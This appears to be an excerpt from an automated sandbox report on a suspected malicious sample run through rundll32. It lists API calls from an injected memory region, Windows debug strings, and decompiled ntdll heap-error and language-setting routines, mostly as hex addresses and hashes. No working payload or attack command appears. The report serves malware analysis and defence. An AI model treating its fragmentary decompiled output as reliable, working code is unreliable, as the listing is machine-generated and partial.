                                                                                                                • RtlAllocateHeap.NTDLL(02A66EF6,?,02A6769D,02A6769D,?,02A66EF6,00000000,?,?,?,?,00000000,00000000,00000002), ref: 02A6CACD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,6398FDE0,00000000,?), ref: 02A6CB0D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(0000B1E8,?,?,?,?,?), ref: 02A5E80A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A5E132,02A5E132,?,00000000,?,?), ref: 02A6CC70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00008003,?,?,02A58D9A,?), ref: 02A5E611
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: ba33e17987b3b042a61960e4377636ba2bbf7f1f6027373fe847ed05d9128245
                                                                                                                • Instruction ID: 21e21bedac9f6b3252126388efbaff3614e5ace59a3e5aefd394c44b10fee835
                                                                                                                • Opcode Fuzzy Hash: ba33e17987b3b042a61960e4377636ba2bbf7f1f6027373fe847ed05d9128245
                                                                                                                • Instruction Fuzzy Hash: D8D05E72AD02093BF620B7F59D42F67328D8B04694F064064FA0CE62C2DD60F50046A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 463ef4e8a78fcbf3c008467904b275bf9113363061ecfb6443b8da9e15c76368
                                                                                                                • Instruction ID: e6a3cbde82082f0cc2439cbd04084347f1ad0a1deea05f807a84f5da101a9710
                                                                                                                • Opcode Fuzzy Hash: 463ef4e8a78fcbf3c008467904b275bf9113363061ecfb6443b8da9e15c76368
                                                                                                                • Instruction Fuzzy Hash: 5BB04CB19424C586FE52D76046086177910ABD0745F16C056D1020651A4778D091F5B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044BB38F
                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 044BB305
                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 044BB39B
                                                                                                                • write to, xrefs: 044BB4A6
                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044BB3D6
                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 044BB484
                                                                                                                • *** enter .exr %p for the exception record, xrefs: 044BB4F1
                                                                                                                • The instruction at %p tried to %s , xrefs: 044BB4B6
                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 044BB323
                                                                                                                • *** enter .cxr %p for the context, xrefs: 044BB50D
                                                                                                                • The critical section is owned by thread %p., xrefs: 044BB3B9
                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 044BB48F
                                                                                                                • an invalid address, %p, xrefs: 044BB4CF
                                                                                                                • The resource is owned shared by %d threads, xrefs: 044BB37E
                                                                                                                • read from, xrefs: 044BB4AD, 044BB4B2
                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 044BB3C5
                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 044BB2DC
                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 044BB314
                                                                                                                • *** then kb to get the faulting stack, xrefs: 044BB51C
                                                                                                                • This failed because of error %Ix., xrefs: 044BB446
                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 044BB47D
                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 044BB374
                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 044BB432
                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 044BB352
                                                                                                                • <unknown>, xrefs: 044BB27E, 044BB2D1, 044BB350, 044BB399, 044BB417, 044BB48E
                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 044BB53F
                                                                                                                • *** Inpage error in %ws:%s, xrefs: 044BB418
                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 044BB2F3
                                                                                                                • a NULL pointer, xrefs: 044BB4E0
                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 044BB476
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                • API String ID: 0-108210295
                                                                                                                • Opcode ID: a816ccedc1c09dd04ba9b5c2128c1e40660ef20f8125228521cb7d42d3dfb32d
                                                                                                                • Instruction ID: 7e8d88f1163f409b8fd9170db96ec33bfbf28e3f441bd476ed2449c448735087
                                                                                                                • Opcode Fuzzy Hash: a816ccedc1c09dd04ba9b5c2128c1e40660ef20f8125228521cb7d42d3dfb32d
                                                                                                                • Instruction Fuzzy Hash: 22811735A00200FFEF265B06DC4ADAB3F66EF46755F00408BF6451B612E271B912EAB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E044C1C06() {
                                                                                                                				signed int _t27;
                                                                                                                				char* _t104;
                                                                                                                				char* _t105;
                                                                                                                				intOrPtr _t113;
                                                                                                                				intOrPtr _t115;
                                                                                                                				intOrPtr _t117;
                                                                                                                				intOrPtr _t119;
                                                                                                                				intOrPtr _t120;
                                                                                                                
                                                                                                                				_t105 = 0x43e48a4;
                                                                                                                				_t104 = "HEAP: ";
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                					_push(_t104);
                                                                                                                					E0440B150();
                                                                                                                				} else {
                                                                                                                					E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                				}
                                                                                                                				_push( *0x44f589c);
                                                                                                                				E0440B150("Heap error detected at %p (heap handle %p)\n",  *0x44f58a0);
                                                                                                                				_t27 =  *0x44f5898; // 0x0
                                                                                                                				if(_t27 <= 0xf) {
                                                                                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M044C1E96))) {
                                                                                                                						case 0:
                                                                                                                							_t105 = "heap_failure_internal";
                                                                                                                							goto L21;
                                                                                                                						case 1:
                                                                                                                							goto L21;
                                                                                                                						case 2:
                                                                                                                							goto L21;
                                                                                                                						case 3:
                                                                                                                							goto L21;
                                                                                                                						case 4:
                                                                                                                							goto L21;
                                                                                                                						case 5:
                                                                                                                							goto L21;
                                                                                                                						case 6:
                                                                                                                							goto L21;
                                                                                                                						case 7:
                                                                                                                							goto L21;
                                                                                                                						case 8:
                                                                                                                							goto L21;
                                                                                                                						case 9:
                                                                                                                							goto L21;
                                                                                                                						case 0xa:
                                                                                                                							goto L21;
                                                                                                                						case 0xb:
                                                                                                                							goto L21;
                                                                                                                						case 0xc:
                                                                                                                							goto L21;
                                                                                                                						case 0xd:
                                                                                                                							goto L21;
                                                                                                                						case 0xe:
                                                                                                                							goto L21;
                                                                                                                						case 0xf:
                                                                                                                							goto L21;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L21:
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                					_push(_t104);
                                                                                                                					E0440B150();
                                                                                                                				} else {
                                                                                                                					E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                				}
                                                                                                                				_push(_t105);
                                                                                                                				E0440B150("Error code: %d - %s\n",  *0x44f5898);
                                                                                                                				_t113 =  *0x44f58a4; // 0x0
                                                                                                                				if(_t113 != 0) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E0440B150();
                                                                                                                					} else {
                                                                                                                						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E0440B150("Parameter1: %p\n",  *0x44f58a4);
                                                                                                                				}
                                                                                                                				_t115 =  *0x44f58a8; // 0x0
                                                                                                                				if(_t115 != 0) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E0440B150();
                                                                                                                					} else {
                                                                                                                						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E0440B150("Parameter2: %p\n",  *0x44f58a8);
                                                                                                                				}
                                                                                                                				_t117 =  *0x44f58ac; // 0x0
                                                                                                                				if(_t117 != 0) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E0440B150();
                                                                                                                					} else {
                                                                                                                						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E0440B150("Parameter3: %p\n",  *0x44f58ac);
                                                                                                                				}
                                                                                                                				_t119 =  *0x44f58b0; // 0x0
                                                                                                                				if(_t119 != 0) {
                                                                                                                					L41:
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E0440B150();
                                                                                                                					} else {
                                                                                                                						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					_push( *0x44f58b4);
                                                                                                                					E0440B150("Last known valid blocks: before - %p, after - %p\n",  *0x44f58b0);
                                                                                                                				} else {
                                                                                                                					_t120 =  *0x44f58b4; // 0x0
                                                                                                                					if(_t120 != 0) {
                                                                                                                						goto L41;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                					_push(_t104);
                                                                                                                					E0440B150();
                                                                                                                				} else {
                                                                                                                					E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                				}
                                                                                                                				return E0440B150("Stack trace available at %p\n", 0x44f58c0);
                                                                                                                			}












                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                • API String ID: 0-2897834094
                                                                                                                • Opcode ID: 59ce93d68d423268eb08d28857d6671991fc47bc84113ec4b0c4aaddc692bfc7
                                                                                                                • Instruction ID: 43edbf7b885ec8e71f3ce08afeed1a356dcf046aa863610e285fdff03a66b33e
                                                                                                                • Opcode Fuzzy Hash: 59ce93d68d423268eb08d28857d6671991fc47bc84113ec4b0c4aaddc692bfc7
                                                                                                                • Instruction Fuzzy Hash: 1661D33A611584EFFB61AB85D886A3173A4EB04A31B4DD03FF5095F353D634BC61AE0A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E04413D34(signed int* __ecx) {
                                                                                                                				signed int* _v8;
                                                                                                                				char _v12;
                                                                                                                				signed int* _v16;
                                                                                                                				signed int* _v20;
                                                                                                                				char _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				char _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int* _v48;
                                                                                                                				signed int* _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				char _v68;
                                                                                                                				signed int _t140;
                                                                                                                				signed int _t161;
                                                                                                                				signed int* _t236;
                                                                                                                				signed int* _t242;
                                                                                                                				signed int* _t243;
                                                                                                                				signed int* _t244;
                                                                                                                				signed int* _t245;
                                                                                                                				signed int _t255;
                                                                                                                				void* _t257;
                                                                                                                				signed int _t260;
                                                                                                                				void* _t262;
                                                                                                                				signed int _t264;
                                                                                                                				void* _t267;
                                                                                                                				signed int _t275;
                                                                                                                				signed int* _t276;
                                                                                                                				short* _t277;
                                                                                                                				signed int* _t278;
                                                                                                                				signed int* _t279;
                                                                                                                				signed int* _t280;
                                                                                                                				short* _t281;
                                                                                                                				signed int* _t282;
                                                                                                                				short* _t283;
                                                                                                                				signed int* _t284;
                                                                                                                				void* _t285;
                                                                                                                
                                                                                                                				_v60 = _v60 | 0xffffffff;
                                                                                                                				_t280 = 0;
                                                                                                                				_t242 = __ecx;
                                                                                                                				_v52 = __ecx;
                                                                                                                				_v8 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v40 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_v32 = 0;
                                                                                                                				_v44 = 0;
                                                                                                                				_v56 = 0;
                                                                                                                				_t275 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					_t280 = 0xc000000d;
                                                                                                                					_t140 = 0;
                                                                                                                					L50:
                                                                                                                					 *_t242 =  *_t242 | 0x00000800;
                                                                                                                					_t242[0x13] = _t140;
                                                                                                                					_t242[0x16] = _v40;
                                                                                                                					_t242[0x18] = _v28;
                                                                                                                					_t242[0x14] = _v32;
                                                                                                                					_t242[0x17] = _t275;
                                                                                                                					_t242[0x15] = _v44;
                                                                                                                					_t242[0x11] = _v56;
                                                                                                                					_t242[0x12] = _v60;
                                                                                                                					return _t280;
                                                                                                                				}
                                                                                                                				if(E04411B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                					_v56 = 1;
                                                                                                                					if(_v8 != 0) {
                                                                                                                						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                                                					}
                                                                                                                					_v8 = _t280;
                                                                                                                				}
                                                                                                                				if(E04411B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                					_v60 =  *_v8;
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                                                					_v8 = _t280;
                                                                                                                				}
                                                                                                                				if(E04411B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                					L16:
                                                                                                                					if(E04411B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                						L28:
                                                                                                                						if(E04411B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                							L46:
                                                                                                                							_t275 = _v16;
                                                                                                                							L47:
                                                                                                                							_t161 = 0;
                                                                                                                							L48:
                                                                                                                							if(_v8 != 0) {
                                                                                                                								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                                                							}
                                                                                                                							_t140 = _v20;
                                                                                                                							if(_t140 != 0) {
                                                                                                                								if(_t275 != 0) {
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                                                									_t275 = 0;
                                                                                                                									_v28 = 0;
                                                                                                                									_t140 = _v20;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L50;
                                                                                                                						}
                                                                                                                						_t167 = _v12;
                                                                                                                						_t255 = _v12 + 4;
                                                                                                                						_v44 = _t255;
                                                                                                                						if(_t255 == 0) {
                                                                                                                							_t276 = _t280;
                                                                                                                							_v32 = _t280;
                                                                                                                						} else {
                                                                                                                							_t276 = L04424620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                                                							_t167 = _v12;
                                                                                                                							_v32 = _t276;
                                                                                                                						}
                                                                                                                						if(_t276 == 0) {
                                                                                                                							_v44 = _t280;
                                                                                                                							_t280 = 0xc0000017;
                                                                                                                							goto L46;
                                                                                                                						} else {
                                                                                                                							E0444F3E0(_t276, _v8, _t167);
                                                                                                                							_v48 = _t276;
                                                                                                                							_t277 = E04451370(_t276, 0x43e4e90);
                                                                                                                							_pop(_t257);
                                                                                                                							if(_t277 == 0) {
                                                                                                                								L38:
                                                                                                                								_t170 = _v48;
                                                                                                                								if( *_v48 != 0) {
                                                                                                                									E0444BB40(0,  &_v68, _t170);
                                                                                                                									if(L044143C0( &_v68,  &_v24) != 0) {
                                                                                                                										_t280 =  &(_t280[0]);
                                                                                                                									}
                                                                                                                								}
                                                                                                                								if(_t280 == 0) {
                                                                                                                									_t280 = 0;
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                                                									_v44 = 0;
                                                                                                                									_v32 = 0;
                                                                                                                								} else {
                                                                                                                									_t280 = 0;
                                                                                                                								}
                                                                                                                								_t174 = _v8;
                                                                                                                								if(_v8 != 0) {
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                                                								}
                                                                                                                								_v8 = _t280;
                                                                                                                								goto L46;
                                                                                                                							}
                                                                                                                							_t243 = _v48;
                                                                                                                							do {
                                                                                                                								 *_t277 = 0;
                                                                                                                								_t278 = _t277 + 2;
                                                                                                                								E0444BB40(_t257,  &_v68, _t243);
                                                                                                                								if(L044143C0( &_v68,  &_v24) != 0) {
                                                                                                                									_t280 =  &(_t280[0]);
                                                                                                                								}
                                                                                                                								_t243 = _t278;
                                                                                                                								_t277 = E04451370(_t278, 0x43e4e90);
                                                                                                                								_pop(_t257);
                                                                                                                							} while (_t277 != 0);
                                                                                                                							_v48 = _t243;
                                                                                                                							_t242 = _v52;
                                                                                                                							goto L38;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t191 = _v12;
                                                                                                                					_t260 = _v12 + 4;
                                                                                                                					_v28 = _t260;
                                                                                                                					if(_t260 == 0) {
                                                                                                                						_t275 = _t280;
                                                                                                                						_v16 = _t280;
                                                                                                                					} else {
                                                                                                                						_t275 = L04424620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                                                						_t191 = _v12;
                                                                                                                						_v16 = _t275;
                                                                                                                					}
                                                                                                                					if(_t275 == 0) {
                                                                                                                						_v28 = _t280;
                                                                                                                						_t280 = 0xc0000017;
                                                                                                                						goto L47;
                                                                                                                					} else {
                                                                                                                						E0444F3E0(_t275, _v8, _t191);
                                                                                                                						_t285 = _t285 + 0xc;
                                                                                                                						_v48 = _t275;
                                                                                                                						_t279 = _t280;
                                                                                                                						_t281 = E04451370(_v16, 0x43e4e90);
                                                                                                                						_pop(_t262);
                                                                                                                						if(_t281 != 0) {
                                                                                                                							_t244 = _v48;
                                                                                                                							do {
                                                                                                                								 *_t281 = 0;
                                                                                                                								_t282 = _t281 + 2;
                                                                                                                								E0444BB40(_t262,  &_v68, _t244);
                                                                                                                								if(L044143C0( &_v68,  &_v24) != 0) {
                                                                                                                									_t279 =  &(_t279[0]);
                                                                                                                								}
                                                                                                                								_t244 = _t282;
                                                                                                                								_t281 = E04451370(_t282, 0x43e4e90);
                                                                                                                								_pop(_t262);
                                                                                                                							} while (_t281 != 0);
                                                                                                                							_v48 = _t244;
                                                                                                                							_t242 = _v52;
                                                                                                                						}
                                                                                                                						_t201 = _v48;
                                                                                                                						_t280 = 0;
                                                                                                                						if( *_v48 != 0) {
                                                                                                                							E0444BB40(_t262,  &_v68, _t201);
                                                                                                                							if(L044143C0( &_v68,  &_v24) != 0) {
                                                                                                                								_t279 =  &(_t279[0]);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t279 == 0) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                                                							_v28 = _t280;
                                                                                                                							_v16 = _t280;
                                                                                                                						}
                                                                                                                						_t202 = _v8;
                                                                                                                						if(_v8 != 0) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                                                						}
                                                                                                                						_v8 = _t280;
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t214 = _v12;
                                                                                                                				_t264 = _v12 + 4;
                                                                                                                				_v40 = _t264;
                                                                                                                				if(_t264 == 0) {
                                                                                                                					_v20 = _t280;
                                                                                                                				} else {
                                                                                                                					_t236 = L04424620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                                                					_t280 = _t236;
                                                                                                                					_v20 = _t236;
                                                                                                                					_t214 = _v12;
                                                                                                                				}
                                                                                                                				if(_t280 == 0) {
                                                                                                                					_t161 = 0;
                                                                                                                					_t280 = 0xc0000017;
                                                                                                                					_v40 = 0;
                                                                                                                					goto L48;
                                                                                                                				} else {
                                                                                                                					E0444F3E0(_t280, _v8, _t214);
                                                                                                                					_t285 = _t285 + 0xc;
                                                                                                                					_v48 = _t280;
                                                                                                                					_t283 = E04451370(_t280, 0x43e4e90);
                                                                                                                					_pop(_t267);
                                                                                                                					if(_t283 != 0) {
                                                                                                                						_t245 = _v48;
                                                                                                                						do {
                                                                                                                							 *_t283 = 0;
                                                                                                                							_t284 = _t283 + 2;
                                                                                                                							E0444BB40(_t267,  &_v68, _t245);
                                                                                                                							if(L044143C0( &_v68,  &_v24) != 0) {
                                                                                                                								_t275 = _t275 + 1;
                                                                                                                							}
                                                                                                                							_t245 = _t284;
                                                                                                                							_t283 = E04451370(_t284, 0x43e4e90);
                                                                                                                							_pop(_t267);
                                                                                                                						} while (_t283 != 0);
                                                                                                                						_v48 = _t245;
                                                                                                                						_t242 = _v52;
                                                                                                                					}
                                                                                                                					_t224 = _v48;
                                                                                                                					_t280 = 0;
                                                                                                                					if( *_v48 != 0) {
                                                                                                                						E0444BB40(_t267,  &_v68, _t224);
                                                                                                                						if(L044143C0( &_v68,  &_v24) != 0) {
                                                                                                                							_t275 = _t275 + 1;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_t275 == 0) {
                                                                                                                						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                                                						_v40 = _t280;
                                                                                                                						_v20 = _t280;
                                                                                                                					}
                                                                                                                					_t225 = _v8;
                                                                                                                					if(_v8 != 0) {
                                                                                                                						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                                                					}
                                                                                                                					_v8 = _t280;
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}










































                                                                                                                0x04414021
                                                                                                                0x04414029
                                                                                                                0x04414030
                                                                                                                0x04414044
                                                                                                                0x04414046
                                                                                                                0x04414046
                                                                                                                0x04414044
                                                                                                                0x04414049
                                                                                                                0x04468327
                                                                                                                0x04468334
                                                                                                                0x04468339
                                                                                                                0x0446833c
                                                                                                                0x0441404f
                                                                                                                0x0441404f
                                                                                                                0x0441404f
                                                                                                                0x04414051
                                                                                                                0x04414056
                                                                                                                0x04414063
                                                                                                                0x04414063
                                                                                                                0x04414068
                                                                                                                0x00000000
                                                                                                                0x04414068
                                                                                                                0x04413fdf
                                                                                                                0x04413fe2
                                                                                                                0x04413fe4
                                                                                                                0x04413fe7
                                                                                                                0x04413fef
                                                                                                                0x04414003
                                                                                                                0x04414005
                                                                                                                0x04414005
                                                                                                                0x0441400c
                                                                                                                0x04414013
                                                                                                                0x04414016
                                                                                                                0x04414017
                                                                                                                0x0441401b
                                                                                                                0x0441401e
                                                                                                                0x00000000
                                                                                                                0x0441401e
                                                                                                                0x04413fb6
                                                                                                                0x04413eb1
                                                                                                                0x04413eb4
                                                                                                                0x04413eb7
                                                                                                                0x04413ebc
                                                                                                                0x044682a9
                                                                                                                0x044682ab
                                                                                                                0x04413ec2
                                                                                                                0x04413ed3
